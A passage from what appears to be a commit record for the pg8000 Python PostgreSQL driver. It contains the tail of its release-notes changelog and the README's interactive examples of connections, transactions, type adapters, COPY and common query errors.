Thanks to\n https:\/\/github.com\/vadv[@vadv] for the contribution.\n\n* Fix warnings from PostgreSQL \"not in a transaction\", when calling\n ``.rollback()`` while not in a transaction, issue\n https:\/\/github.com\/mfenniak\/pg8000\/issues\/113[#113]. Thanks to\n https:\/\/github.com\/jamadden[@jamadden] for the contribution.\n\n* Errors from the server are now always passed through in full.\n\n\n=== Version 1.10.6, 2016-06-10\n\n* Fixed a problem where we weren't handling the password connection parameter\n correctly. Now it's handled in the same way as the 'user' and 'database'\n parameters, ie. if the password is bytes, then pass it straight through to the\n database, if it's a string then encode it with utf8.\n\n* It used to be that if the 'user' parameter to the connection function was\n 'None', then pg8000 would try and look at environment variables to find a\n username. Now we just go by the 'user' parameter only, and give an error if\n it's None.\n\n\n=== Version 1.10.5, 2016-03-04\n\n- Include LICENCE text and sources for docs in the source distribution (the\n tarball).\n\n\n=== Version 1.10.4, 2016-02-27\n\n* Fixed bug where if a str is sent as a query parameter, and then with the same\n cursor an int is sent instead of a string, for the same query, then it fails.\n\n* Under Python 2, a str type is now sent 'as is', ie. as a byte string rather\n than trying to decode and send according to the client encoding. Under Python\n 2 it's recommended to send text as unicode() objects.\n\n* Dropped and added support for Python versions. Now pg8000 supports\n Python 2.7+ and Python 3.3+.\n\n* Dropped and added support for PostgreSQL versions. Now pg8000 supports\n PostgreSQL 9.1+.\n\n* pg8000 uses the 'six' library for making the same code run on both Python 2\n and Python 3. We used to include it as a file in the pg8000 source code. Now\n we have it as a separate dependency that's installed with 'pip install'. The\n reason for doing this is that package maintainers for OS distributions\n prefer unbundled libraries.\n\n\n=== Version 1.10.3, 2016-01-07\n\n* Removed testing for PostgreSQL 9.0 as it's no longer supported by the\n PostgreSQL Global Development Group.\n* Fixed bug where pg8000 would fail with datetimes if PostgreSQL was compiled\n with the integer_datetimes option set to 'off'. The bug was in the\n timestamp_send_float function.\n\n\n=== Version 1.10.2, 2015-03-17\n\n* If there's a socket exception thrown when communicating with the database,\n it is now wrapped in an OperationalError exception, to conform to the DB-API\n spec.\n\n* Previously, pg8000 didn't recognize the EmptyQueryResponse (that the server\n sends back if the SQL query is an empty string). Now we raise a\n ProgrammingError exception.\n\n* Added socket timeout option for Python 3.\n\n* If the server returns an error, we used to initialize the ProgrammingError\n with just the first three fields of the error. Now we initialize the\n ProgrammingError with all the fields.\n\n* Use relative imports inside package.\n\n* User and database names given as bytes. The user and database parameters of\n the connect() function are now passed directly as bytes to the server. If the\n type of the parameter is unicode, pg8000 converts it to bytes using the utf8\n encoding.\n\n* Added support for JSON and JSONB Postgres types. We take the approach of\n taking serialized JSON (str) as an SQL parameter, but returning results as\n de-serialized JSON (Python objects). 
See the example in the Quickstart.\n\n* Added CircleCI continuous integration.\n\n* String support in arrays now allow letters like \"u\", braces and whitespace.\n\n\n=== Version 1.10.1, 2014-09-15\n\n* Add support for the Wheel package format.\n\n* Remove option to set a connection timeout. For communicating with the server,\n pg8000 uses a file-like object using socket.makefile() but you can't use this\n if the underlying socket has a timeout.\n\n\n=== Version 1.10.0, 2014-08-30\n\n* Remove the old ``pg8000.dbapi`` and ``pg8000.DBAPI`` namespaces. For example,\n now only ``pg8000.connect()`` will work, and ``pg8000.dbapi.connect()``\n won't work any more.\n\n* Parse server version string with LooseVersion. This should solve the problems\n that people have been having when using versions of PostgreSQL such as\n ``9.4beta2``.\n\n* Message if portal suspended in autocommit. Give a proper error message if the\n portal is suspended while in autocommit mode. The error is that the portal is\n closed when the transaction is closed, and so in autocommit mode the portal\n will be immediately closed. The bottom line is, don't use autocommit mode if\n there's a chance of retrieving more rows than the cache holds (currently 100).\n\n\n=== Version 1.9.14, 2014-08-02\n\n* Make ``executemany()`` set ``rowcount``. Previously, ``executemany()`` would\n always set ``rowcount`` to -1. Now we set it to a meaningful value if\n possible. If any of the statements have a -1 ``rowcount`` then the\n ``rowcount`` for the ``executemany()`` is -1, otherwise the ``executemany()``\n ``rowcount`` is the sum of the rowcounts of the individual statements.\n\n* Support for password authentication. pg8000 didn't support plain text\n authentication, now it does.\n\n\n=== Version 1.9.13, 2014-07-27\n\n* Reverted to using the string ``connection is closed`` as the message of the\n exception that's thrown if a connection is closed. For a few versions we were\n using a slightly different one with capitalization and punctuation, but we've\n reverted to the original because it's easier for users of the library to\n consume.\n\n* Previously, ``tpc_recover()`` would start a transaction if one was not already\n in progress. Now it won't.\n\n\n=== Version 1.9.12, 2014-07-22\n\n* Fixed bug in ``tpc_commit()`` where a single phase commit failed.\n\n\n=== Version 1.9.11, 2014-07-20\n\n* Add support for two-phase commit DBAPI extension. Thanks to Mariano Reingart's\n TPC code on the Google Code version:\n\n https:\/\/code.google.com\/p\/pg8000\/source\/detail?r=c8609701b348b1812c418e2c7\n\n on which the code for this commit is based.\n\n* Deprecate ``copy_from()`` and ``copy_to()``. The methods ``copy_from()`` and\n ``copy_to()`` of the ``Cursor`` object are deprecated because it's simpler and\n more flexible to use the ``execute()`` method with a ``fileobj`` parameter.\n\n* Fixed bug in reporting unsupported authentication codes. Thanks to\n https:\/\/github.com\/hackgnar for reporting this and providing the fix.\n\n* Have a default for the ``user`` parameter of the ``connect()`` function. If\n the ``user`` parameter of the ``connect()`` function isn't provided, look\n first for the ``PGUSER`` then the ``USER`` environment variables. Thanks to\n Alex Gaynor https:\/\/github.com\/alex for this suggestion.\n\n* Before PostgreSQL 8.2, ``COPY`` didn't give row count. Until PostgreSQL 8.2\n (which includes Amazon Redshift which forked at 8.0) the ``COPY`` command\n didn't return a row count, but pg8000 thought it did. 
That's fixed now.\n\n\n=== Version 1.9.10, 2014-06-08\n\n* Remember prepared statements. Now prepared statements are never closed, and\n pg8000 remembers which ones are on the server, and uses them when a query is\n repeated. This gives an increase in performance, because on subsequent\n queries the prepared statement doesn't need to be created each time.\n\n* For performance reasons, pg8000 never closed portals explicitly, it just\n let the server close them at the end of the transaction. However, this can\n cause memory problems for long running transactions, so now pg8000 always\n closes a portal after it's exhausted.\n\n* Fixed bug where unicode arrays failed under Python 2. Thanks to\n https:\/\/github.com\/jdkx for reporting this.\n\n* A FLUSH message is now sent after every message (except SYNC). This is in\n accordance with the protocol docs, and ensures the server sends back its\n responses straight away.\n\n\n=== Version 1.9.9, 2014-05-12\n\n* The PostgreSQL interval type is now mapped to datetime.timedelta where\n possible. Previously the PostgreSQL interval type was always mapped to the\n pg8000.Interval type. However, to support the datetime.timedelta type we\n now use it whenever possible. Unfortunately it's not always possible because\n timedelta doesn't support months. If months are needed then the fall-back\n is the pg8000.Interval type. This approach means we handle timedelta in a\n similar way to other Python PostgreSQL drivers, and it makes pg8000\n compatible with popular ORMs like SQLAlchemy.\n\n* Fixed bug in executemany() where a new prepared statement should be created\n for each variation in the oids of the parameter sets.\n\n\n=== Version 1.9.8, 2014-05-05\n\n* We used to ask the server for a description of the statement, and then ask\n for a description of each subsequent portal. We now only ask for a\n description of the statement. This results in a significant performance\n improvement, especially for executemany() calls and when using the\n 'use_cache' option of the connect() function.\n\n* Fixed warning in Python 3.4 which was saying that a socket hadn't been\n closed. It seems that closing a socket file doesn't close the underlying\n socket.\n\n* Now should cope with PostgreSQL 8 versions before 8.4. This includes Amazon\n Redshift.\n\n* Added 'unicode' alias for 'utf-8', which is needed for Amazon Redshift.\n\n* Various other bug fixes.\n\n\n=== Version 1.9.7, 2014-03-26\n\n* Caching of prepared statements. There's now a 'use_cache' boolean parameter\n for the connect() function, which causes all prepared statements to be cached\n by pg8000, keyed on the SQL query string. This should speed things up\n significantly in most cases.\n\n* Added support for the PostgreSQL inet type. It maps to the Python types\n IPv*Address and IPv*Network.\n\n* Added support for PostgreSQL +\/- infinity date and timestamp values. Now the\n Python value datetime.datetime.max maps to the PostgreSQL value 'infinity'\n and datetime.datetime.min maps to '-infinity', and the same for\n datetime.date.\n\n* Added support for the PostgreSQL types int2vector and xid, which are mostly\n used internally by PostgreSQL.\n\n\n=== Version 1.9.6, 2014-02-26\n\n* Fixed a bug where 'portal does not exist' errors were being generated. Some\n queries that should have been run in a transaction were run in autocommit\n mode and so any that suspended a portal had the portal immediately closed,\n because a portal can only exist within a transaction. 
This has been solved by\n determining the transaction status from the READY_FOR_QUERY message.\n\n\n=== Version 1.9.5, 2014-02-15\n\n* Removed warn() calls for __next__() and __iter__(). Removing the warn() in\n __next__() improves the performance tests by ~20%.\n\n* Increased performance of timestamp by ~20%. Should also improve timestamptz.\n\n* Moved statement_number and portal_number from module to Connection. This\n should reduce lock contention for cases where there's a single module and\n lots of connections.\n\n* Make decimal_out\/in and time_in use client_encoding. These functions used to\n assume ascii, and I can't think of a case where that wouldn't work.\n Nonetheless, that theoretical bug is now fixed.\n\n* Fixed a bug in cursor.executemany(), where a parameter that was non-None in\n one sequence of parameters was None in a subsequent sequence of parameters.\n\n\n=== Version 1.9.4, 2014-01-18\n\n* Fixed a bug where with Python 2, a parameter with the value Decimal('12.44'),\n (and probably other numbers) isn't sent correctly to PostgreSQL, and so the\n command fails. This has been fixed by sending decimal types as text rather\n than binary. I'd imagine it's slightly faster too.\n\n\n=== Version 1.9.3, 2014-01-16\n\n* Fixed bug where there were missing trailing zeros after the decimal point in\n the NUMERIC type. For example, the NUMERIC value 1.0 was returned as 1 (with\n no zero after the decimal point).\n\n This is fixed by making pg8000 use the text rather than binary\n representation for the numeric type. This actually doubles the speed of\n numeric queries.\n\n\n=== Version 1.9.2, 2013-12-17\n\n* Fixed incompatibility with PostgreSQL 8.4. In 8.4, the CommandComplete\n message doesn't return a row count if the command is SELECT. We now look at\n the server version and don't look for a row count for a SELECT with version\n 8.4.\n\n\n=== Version 1.9.1, 2013-12-15\n\n* Fixed bug where the Python 2 'unicode' type wasn't recognized in a query\n parameter.\n\n\n=== Version 1.9.0, 2013-12-01\n\n* For Python 3, the :class:`bytes` type replaces the :class:`pg8000.Bytea`\n type. For backward compatibility the :class:`pg8000.Bytea` still works under\n Python 3, but its use is deprecated.\n\n* A single codebase for Python 2 and 3.\n\n* Everything (functions, properties, classes) is now available under the\n ``pg8000`` namespace. So for example:\n\n * pg8000.DBAPI.connect() -> pg8000.connect()\n * pg8000.DBAPI.apilevel -> pg8000.apilevel\n * pg8000.DBAPI.threadsafety -> pg8000.threadsafety\n * pg8000.DBAPI.paramstyle -> pg8000.paramstyle\n * pg8000.types.Bytea -> pg8000.Bytea\n * pg8000.types.Interval -> pg8000.Interval\n * pg8000.errors.Warning -> pg8000.Warning\n * pg8000.errors.Error -> pg8000.Error\n * pg8000.errors.InterfaceError -> pg8000.InterfaceError\n * pg8000.errors.DatabaseError -> pg8000.DatabaseError\n\n The old locations are deprecated, but still work for backward compatibility.\n\n* Lots of performance improvements.\n\n * Faster receiving of ``numeric`` types.\n * Query only parsed when PreparedStatement is created.\n * PreparedStatement re-used in executemany()\n * Use ``collections.deque`` rather than ``list`` for the row cache. We're\n adding to one end and removing from the other. 
This is O(n) for a list but\n O(1) for a deque.\n * Find the conversion function and do the format code check in the\n ROW_DESCRIPTION handler, rather than every time in the ROW_DATA handler.\n * Use the 'unpack_from' form of struct, when unpacking the data row, so we\n don't have to slice the data.\n * Return row as a list for better performance. At the moment result rows are\n turned into a tuple before being returned. Returning the rows directly as a\n list speeds up the performance tests about 5%.\n * Simplify the event loop. Now the main event loop just continues until a\n READY_FOR_QUERY message is received. This follows the suggestion in the\n Postgres protocol docs. There's not much of a difference in speed, but the\n code is a bit simpler, and it should make things more robust.\n * Re-arrange the code as a state machine to give > 30% speedup.\n * Using pre-compiled struct objects. Pre-compiled struct objects are a bit\n faster than using the struct functions directly. It also hopefully adds to\n the readability of the code.\n * Speeded up _send. Before calling the socket 'write' method, we were\n checking that the 'data' type implements the 'buffer' interface (bytes or\n bytearray), but the check isn't needed because 'write' raises an exception\n if data is of the wrong type.\n\n\n* Add facility for turning auto-commit on. This follows the suggestion of\n funkybob to fix the problem of not being able to execute a command such as\n 'create database' that must be executed outside a transaction. Now you can do\n conn.autocommit = True and then execute 'create database'.\n\n* Add support for the PostgreSQL ``uid`` type. Thanks to Rad Cirskis.\n\n* Add support for the PostgreSQL XML type.\n\n* Add support for the PostgreSQL ``enum`` user defined types.\n\n* Fix a socket leak, where a problem opening a connection could leave a socket\n open.\n\n* Fix empty array issue. https:\/\/github.com\/mfenniak\/pg8000\/issues\/10\n\n* Fix scale on ``numeric`` types. https:\/\/github.com\/mfenniak\/pg8000\/pull\/13\n\n* Fix numeric_send. Thanks to Christian Hofstaedtler.\n\n\n=== Version 1.08, 2010-06-08\n\n* Removed usage of deprecated :mod:`md5` module, replaced with :mod:`hashlib`.\n Thanks to Gavin Sherry for the patch.\n\n* Start transactions on execute or executemany, rather than immediately at the\n end of previous transaction. Thanks to Ben Moran for the patch.\n\n* Add encoding lookups where needed, to address usage of SQL_ASCII encoding.\n Thanks to Benjamin Schweizer for the patch.\n\n* Remove record type cache SQL query on every new pg8000 connection.\n\n* Fix and test SSL connections.\n\n* Handle out-of-band messages during authentication.\n\n\n=== Version 1.07, 2009-01-06\n\n* Added support for :meth:`~pg8000.dbapi.CursorWrapper.copy_to` and\n :meth:`~pg8000.dbapi.CursorWrapper.copy_from` methods on cursor objects, to\n allow the usage of the PostgreSQL COPY queries. Thanks to Bob Ippolito for\n the original patch.\n\n* Added the :attr:`~pg8000.dbapi.ConnectionWrapper.notifies` and\n :attr:`~pg8000.dbapi.ConnectionWrapper.notifies_lock` attributes to DBAPI\n connection objects to provide access to server-side event notifications.\n Thanks again to Bob Ippolito for the original patch.\n\n* Improved performance using buffered socket I\/O.\n\n* Added valid range checks for :class:`~pg8000.types.Interval` attributes.\n\n* Added binary transmission of :class:`~decimal.Decimal` values. 
This permits\n full support for NUMERIC[] types, both send and receive.\n\n* New `Sphinx <http:\/\/sphinx.pocoo.org\/>`_-based website and documentation.\n\n\n=== Version 1.06, 2008-12-09\n\n* pg8000-py3: a branch of pg8000 fully supporting Python 3.0.\n\n* New Sphinx-based documentation.\n\n* Support for PostgreSQL array types -- INT2[], INT4[], INT8[], FLOAT[],\n DOUBLE[], BOOL[], and TEXT[]. New support permits both sending and\n receiving these values.\n\n* Limited support for receiving RECORD types. If a record type is received,\n it will be translated into a Python dict object.\n\n* Fixed potential threading bug where the socket lock could be lost during\n error handling.\n\n\n=== Version 1.05, 2008-09-03\n\n* Proper support for timestamptz field type:\n\n * Reading a timestamptz field results in a datetime.datetime instance that\n has a valid tzinfo property. tzinfo is always UTC.\n\n * Sending a datetime.datetime instance with a tzinfo value will be\n sent as a timestamptz type, with the appropriate tz conversions done.\n\n* Map postgres <-> python text encodings correctly.\n\n* Fix bug where underscores were not permitted in pyformat names.\n\n* Support \"%s\" in a pyformat string.\n\n* Add cursor.connection DB-API extension.\n\n* Add cursor.next and cursor.__iter__ DB-API extensions.\n\n* DBAPI documentation improvements.\n\n* Don't attempt rollback in cursor.execute if a ConnectionClosedError occurs.\n\n* Add warning for accessing exceptions as attributes on the connection object,\n as per DB-API spec.\n\n* Fix up open connection when an unexpected error occurs, rather than\n leaving the connection in an unusable state.\n\n* Use setuptools\/egg package format.\n\n\n=== Version 1.04, 2008-05-12\n\n* DBAPI 2.0 compatibility:\n\n * rowcount returns rows affected when appropriate (eg. UPDATE, DELETE)\n\n * Fix CursorWrapper.description to return a 7 element tuple, as per spec.\n\n * Fix CursorWrapper.rowcount when using executemany.\n\n * Fix CursorWrapper.fetchmany to return an empty sequence when no more\n results are available.\n\n * Add access to DBAPI exceptions through connection properties.\n\n * Raise exception on closing a closed connection.\n\n * Change DBAPI.STRING to varchar type.\n\n * rowcount returns -1 when appropriate.\n\n * DBAPI implementation now passes Stuart Bishop's Python DB API 2.0 Anal\n Compliance Unit Test.\n\n* Make interface.Cursor class use unnamed prepared statement that binds to\n parameter value types. 
This change increases the accuracy of PG's query\n plans by including parameter information, hence increasing performance in\n some scenarios.\n\n* Raise exception when reading from a cursor without a result set.\n\n* Fix bug where a parse error may have rendered a connection unusable.\n\n\n=== Version 1.03, 2008-05-09\n\n* Separate pg8000.py into multiple python modules within the pg8000 package.\n There should be no need for a client to change how pg8000 is imported.\n\n* Fix bug in row_description property when query has not been completed.\n\n* Fix bug in fetchmany dbapi method that did not properly deal with the end of\n result sets.\n\n* Add close methods to DB connections.\n\n* Add callback event handlers for server notices, notifications, and runtime\n configuration changes.\n\n* Add boolean type output.\n\n* Add date, time, and timestamp types in\/out.\n\n* Add recognition of \"SQL_ASCII\" client encoding, which maps to Python's\n \"ascii\" encoding.\n\n* Add types.Interval class to represent PostgreSQL's interval data type, and\n appropriate wire send\/receive methods.\n\n* Remove unused type conversion methods.\n\n\n=== Version 1.02, 2007-03-13\n\n* Add complete DB-API 2.0 interface.\n\n* Add basic SSL support via ssl connect bool.\n\n* Rewrite pg8000_test.py to use Python's unittest library.\n\n* Add bytea type support.\n\n* Add support for parameter output types: NULL value, timestamp value, python\n long value.\n\n* Add support for input parameter type oid.\n\n\n=== Version 1.01, 2007-03-09\n\n* Add support for writing floats and decimal objs up to PG backend.\n\n* Add new error handling code and tests to make sure connection can recover\n from a database error.\n\n* Fixed bug where timestamp types were not always returned in the same binary\n format from the PG backend. Text format is now being used to send\n timestamps.\n\n* Fixed bug where large packets from the server were not being read fully, due\n to socket.read not always returning full read size requested. It was a\n lazy-coding bug.\n\n* Added locks to make most of the library thread-safe.\n\n* Added UNIX socket support.\n\n\n=== Version 1.00, 2007-03-08\n\n* First public release. Although fully functional, this release is mostly\n lacking in production testing and in type support.\n","old_contents":"= pg8000\n:toc: preamble\n\npg8000 is a pure-link:http:\/\/www.python.org\/[Python]\nhttp:\/\/www.postgresql.org\/[PostgreSQL] driver that complies with\nhttp:\/\/www.python.org\/dev\/peps\/pep-0249\/[DB-API 2.0]. It is tested on Python\nversions 3.6+, on CPython and PyPy, and PostgreSQL versions 9.5+.\npg8000's name comes from the belief that it is probably about the 8000th\nPostgreSQL interface for Python. pg8000 is distributed under the BSD 3-clause\nlicense.\n\nAll bug reports, feature requests and contributions are welcome at\nhttp:\/\/github.com\/tlocke\/pg8000\/.\n\nimage::https:\/\/github.com\/tlocke\/pg8000\/workflows\/pg8000\/badge.svg[Build Status]\n\n\n== Installation\n\nTo install pg8000 using `pip` type:\n\n`pip install pg8000`\n\n\n== Native API Interactive Examples\n\npg8000 comes with two APIs, the native pg8000 API and the DB-API 2.0 standard\nAPI. 
These are the examples for the native API, and the DB-API 2.0 examples\nfollow in the next section.\n\n\n=== Basic Example\n\nImport pg8000, connect to the database, create a table, add some rows and then\nquery the table:\n\n[source,python]\n----\n>>> import pg8000.native\n>>>\n>>> # Connect to the database with user name postgres\n>>>\n>>> con = pg8000.native.Connection(\"postgres\", password=\"cpsnow\")\n>>>\n>>> # Create a temporary table\n>>>\n>>> con.run(\"CREATE TEMPORARY TABLE book (id SERIAL, title TEXT)\")\n[]\n>>>\n>>> # Populate the table\n>>>\n>>> for title in (\"Ender's Game\", \"The Magus\"):\n... con.run(\"INSERT INTO book (title) VALUES (:title)\", title=title)\n[]\n[]\n>>>\n>>> # Print all the rows in the table\n>>>\n>>> for row in con.run(\"SELECT * FROM book\"):\n... print(row)\n[1, \"Ender's Game\"]\n[2, 'The Magus']\n\n----\n\n\n=== Transactions\n\nHere's how to run groups of SQL statements in a\nhttps:\/\/www.postgresql.org\/docs\/current\/tutorial-transactions.html[transaction]:\n\n[source,python]\n----\n>>> con.run(\"START TRANSACTION\")\n[]\n>>> con.run(\"INSERT INTO book (title) VALUES (:title)\", title=\"Phineas Finn\") \n[]\n>>> con.run(\"COMMIT\")\n[]\n>>> for row in con.run(\"SELECT * FROM book\"):\n... print(row)\n[1, \"Ender's Game\"]\n[2, 'The Magus']\n[3, 'Phineas Finn']\n\n----\n\nrolling back a transaction:\n\n[source,python]\n----\n>>> con.run(\"START TRANSACTION\")\n[]\n>>> con.run(\"DELETE FROM book WHERE title = :title\", title=\"Phineas Finn\") \n[]\n>>> con.run(\"ROLLBACK\")\n[]\n>>> for row in con.run(\"SELECT * FROM book\"):\n... print(row)\n[1, \"Ender's Game\"]\n[2, 'The Magus']\n[3, 'Phineas Finn']\n\n----\n\n\n=== Query Using Functions\n\nAnother query, using some PostgreSQL functions:\n\n[source,python]\n----\n>>> con.run(\"SELECT extract(millennium from now())\")\n[[3.0]]\n\n----\n\n\n=== Interval Type\n\nA query that returns the PostgreSQL interval type:\n\n[source,python]\n----\n>>> import datetime\n>>>\n>>> ts = datetime.date(1980, 4, 27)\n>>> con.run(\"SELECT timestamp '2013-12-01 16:06' - :ts\", ts=ts)\n[[datetime.timedelta(days=12271, seconds=57960)]]\n\n----\n\n\n=== Point Type\n\nA round-trip with a\nhttps:\/\/www.postgresql.org\/docs\/current\/datatype-geometric.html[PostgreSQL\npoint] type:\n\n[source,python]\n----\n>>> con.run(\"SELECT CAST(:pt as point)\", pt='(2.3,1)')\n[['(2.3,1)']]\n\n----\n\n\n=== Client Encoding\n\nWhen communicating with the server, pg8000 uses the character set that the\nserver asks it to use (the client encoding). By default the client encoding is\nthe database's character set (chosen when the database is created), but the\nclient encoding can be changed in a number of ways (eg. setting\nCLIENT_ENCODING in postgresql.conf). Another way of changing the client\nencoding is by using an SQL command. For example:\n\n[source,python]\n----\n>>> con.run(\"SET CLIENT_ENCODING TO 'UTF8'\")\n[]\n>>> con.run(\"SHOW CLIENT_ENCODING\")\n[['UTF8']]\n\n----\n\n\n=== JSONB and JSON\n\nJSONB (and JSON) always comes back from the server de-serialized. 
If the JSON\nyou want to send is a `dict` then you can just do:\n\n[source,python]\n----\n>>> import json\n>>> val = {'name': 'Apollo 11 Cave', 'zebra': True, 'age': 26.003}\n>>> con.run(\"SELECT :apollo\", apollo=val)\n[[{'age': 26.003, 'name': 'Apollo 11 Cave', 'zebra': True}]]\n\n----\n\nJSON can always be sent in serialized form to the server:\n\n[source,python]\n----\n>>> import json\n>>> val = ['Apollo 11 Cave', True, 26.003]\n>>> con.run(\"SELECT CAST(:apollo as json)\", apollo=json.dumps(val))\n[[['Apollo 11 Cave', True, 26.003]]]\n\n----\n\n\n=== Retrieve Column Metadata From Results\n\nFind the column metadata returned from a query:\n\n[source,python]\n----\n>>> con.run(\"create temporary table quark (id serial, name text)\")\n[]\n>>> for name in ('Up', 'Down'):\n... con.run(\"INSERT INTO quark (name) VALUES (:name)\", name=name)\n[]\n[]\n>>> # Now execute the query\n>>>\n>>> con.run(\"SELECT * FROM quark\")\n[[1, 'Up'], [2, 'Down']]\n>>>\n>>> # and retrieve the metadata\n>>>\n>>> con.columns\n[{'table_oid': ..., 'column_attrnum': 1, 'type_oid': 23, 'type_size': 4, 'type_modifier': -1, 'format': 0, 'name': 'id'}, {'table_oid': ..., 'column_attrnum': 2, 'type_oid': 25, 'type_size': -1, 'type_modifier': -1, 'format': 0, 'name': 'name'}]\n>>>\n>>> # Show just the column names\n>>>\n>>> [c['name'] for c in con.columns]\n['id', 'name']\n\n----\n\n\n=== Notices And Notifications\n\nPostgreSQL https:\/\/www.postgresql.org\/docs\/current\/static\/plpgsql-errors-and-messages.html[notices]\nare stored in a deque called `Connection.notices` and added using the\n`append()` method. Similarly there are `Connection.notifications` for\nhttps:\/\/www.postgresql.org\/docs\/current\/static\/sql-notify.html[notifications]\nand `Connection.parameter_statuses` for changes to the server configuration.\nHere's an example:\n\n[source,python]\n----\n>>> con.run(\"LISTEN aliens_landed\")\n[]\n>>> con.run(\"NOTIFY aliens_landed\")\n[]\n>>> # A notification is a tuple containing (backend_pid, channel, payload)\n>>>\n>>> con.notifications[0]\n(..., 'aliens_landed', '')\n\n----\n\n\n=== LIMIT ALL\n\nYou might think that the following would work, but in fact it fails:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' LIMIT :lim\", lim='ALL')\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\nInstead the https:\/\/www.postgresql.org\/docs\/current\/sql-select.html[docs say]\nthat you can send `null` as an alternative to `ALL`, which does work:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' LIMIT :lim\", lim=None)\n[['silo 1']]\n\n----\n\n\n=== IN and NOT IN\n\nYou might think that the following would work, but in fact the server doesn't\nlike it:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' WHERE 'a' IN :v\", v=('a', 'b'))\nTraceback (most recent call last):\npg8000.exceptions.DatabaseError: ...\n\n----\n\ninstead you can write it using the\nhttps:\/\/www.postgresql.org\/docs\/current\/functions-array.html[`unnest`]\nfunction:\n\n[source,python]\n----\n>>> con.run(\"SELECT 'silo 1' WHERE 'a' IN (SELECT unnest(:v))\", v=('a', 'b'))\n[['silo 1']]\n\n----\n\nand you can do the same for `NOT IN`.\n\n\n=== Many SQL Statements Can't Be Parameterized\n\nIn PostgreSQL parameters can only be used for\nhttps:\/\/www.postgresql.org\/docs\/current\/xfunc-sql.html#XFUNC-SQL-FUNCTION-ARGUMENTS[data values, not identifiers]. 
=== Many SQL Statements Can't Be Parameterized

In PostgreSQL parameters can only be used for
https://www.postgresql.org/docs/current/xfunc-sql.html#XFUNC-SQL-FUNCTION-ARGUMENTS[data values, not identifiers].
Sometimes this might not work as expected, for example the following fails:

[source,python]
----
>>> con.run("CREATE USER juan WITH PASSWORD :password", password='quail')
Traceback (most recent call last):
pg8000.exceptions.DatabaseError: ...

----

It fails because the PostgreSQL server doesn't allow this statement to have
any parameters. There are many SQL statements that one might think would have
parameters, but don't.


=== COPY from and to a file

The SQL https://www.postgresql.org/docs/current/sql-copy.html[COPY] statement
can be used to copy from and to a file or file-like object. Here's an example
using the CSV format:

[source,python]
----

>>> from io import BytesIO
>>> import csv
>>> import codecs
>>>
>>> # Create a CSV file in memory
>>>
>>> stream_in = BytesIO()
>>> StreamWriter = codecs.getwriter('utf-8')
>>> csv_writer = csv.writer(StreamWriter(stream_in))
>>> csv_writer.writerow([1, "electron"])
>>> csv_writer.writerow([2, "muon"])
>>> csv_writer.writerow([3, "tau"])
>>> stream_in.seek(0)
0
>>>
>>> # Create a table and then copy the CSV into it
>>>
>>> con.run("CREATE TEMPORARY TABLE lepton (id SERIAL, name TEXT)")
[]
>>> con.run("COPY lepton FROM STDIN WITH (FORMAT CSV)", stream=stream_in)
[]
>>>
>>> # COPY from a table to a stream
>>>
>>> stream_out = BytesIO()
>>> con.run("COPY lepton TO STDOUT WITH (FORMAT CSV)", stream=stream_out)
[]
>>> stream_out.seek(0)
0
>>> StreamReader = codecs.getreader('utf-8')
>>> for row in csv.reader(StreamReader(stream_out)):
...     print(row)
['1', 'electron']
['2', 'muon']
['3', 'tau']

----


=== Execute Multiple SQL Statements

If you want to execute a series of SQL statements (eg. an `.sql` file), you
can run them as expected:

[source,python]
----

>>> statements = "SELECT 5; SELECT 'Erich Fromm';"
>>>
>>> con.run(statements)
[[5], ['Erich Fromm']]

----

The only caveat is that when executing multiple statements you can't have any
parameters.


=== Quoted Identifiers in SQL

Say you had a column called `My Column`. Since it's case sensitive and
contains a space, you'd have to
https://www.postgresql.org/docs/current/sql-syntax-lexical.html#SQL-SYNTAX-IDENTIFIERS[surround it by double quotes]. But you can't do:

[source,python]
----
>>> con.run("select 'hello' as "My Column"")
Traceback (most recent call last):
SyntaxError: invalid syntax

----

since Python uses double quotes to delimit string literals, so one solution is
to use Python's
https://docs.python.org/3/tutorial/introduction.html#strings[triple quotes]
to delimit the string instead:

[source,python]
----
>>> con.run('''select 'hello' as "My Column"''')
[['hello']]

----
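Another option (plain Python backslash escaping, shown here as an equivalent
alternative) is to escape the double quotes within the string:

[source,python]
----
>>> con.run("select 'hello' as \"My Column\"")
[['hello']]

----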
=== Custom adapter from a Python type to a PostgreSQL type

pg8000 has a mapping from Python types to PostgreSQL types for when it needs
to send SQL parameters to the server. The default mapping that comes with
pg8000 is designed to work well in most cases, but you might want to add or
replace the default mapping.

A Python `datetime.timedelta` object is sent to the server as a PostgreSQL
`interval` type, which has the `oid` 1186. But let's say we wanted to create
our own Python class to be sent as an `interval` type. Then we'd have to
register an adapter:

[source,python]
----

>>> class MyInterval(str):
...     pass
>>>
>>> def my_interval_out(my_interval):
...     return my_interval  # Must return a str
>>>
>>> con.register_out_adapter(MyInterval, 1186, my_interval_out)
>>> con.run("SELECT :interval", interval=MyInterval("2 hours"))
[[datetime.timedelta(seconds=7200)]]

----

Note that it still came back as a `datetime.timedelta` object because we only
changed the mapping from Python to PostgreSQL. See below for an example of how
to change the mapping from PostgreSQL to Python.


=== Custom adapter from a PostgreSQL type to a Python type

pg8000 has a mapping from PostgreSQL types to Python types for when it receives
SQL results from the server. The default mapping that comes with pg8000 is
designed to work well in most cases, but you might want to add or replace the
default mapping.

If pg8000 receives a PostgreSQL `interval` type, which has the `oid` 1186, it
converts it into a Python `datetime.timedelta` object. But let's say we wanted
to create our own Python class to be used instead of `datetime.timedelta`. Then
we'd have to register an adapter:


[source,python]
----

>>> class MyInterval(str):
...     pass
>>>
>>> def my_interval_in(my_interval_str):  # The parameter is of type str
...     return MyInterval(my_interval_str)
>>>
>>> con.register_in_adapter(1186, my_interval_in)
>>> con.run("SELECT CAST('2 years' AS interval)")
[['2 years']]

----

Note that registering the 'in' adapter only affects the mapping from the
PostgreSQL type to the Python type. See above for an example of how to change
the mapping from Python to PostgreSQL.


=== Could Not Determine Data Type Of Parameter

Sometimes you'll get the 'could not determine data type of parameter' error
message from the server:

[source,python]
----

>>> con.run("SELECT :v IS NULL", v=None)
Traceback (most recent call last):
pg8000.exceptions.DatabaseError: {'S': 'ERROR', 'V': 'ERROR', 'C': '42P18', 'M': 'could not determine data type of parameter $1', 'F': 'postgres.c', 'L': '...', 'R': 'exec_parse_message'}

----

One way of solving it is to put a `cast` in the SQL:

[source,python]
----

>>> con.run("SELECT cast(:v as TIMESTAMP) IS NULL", v=None)
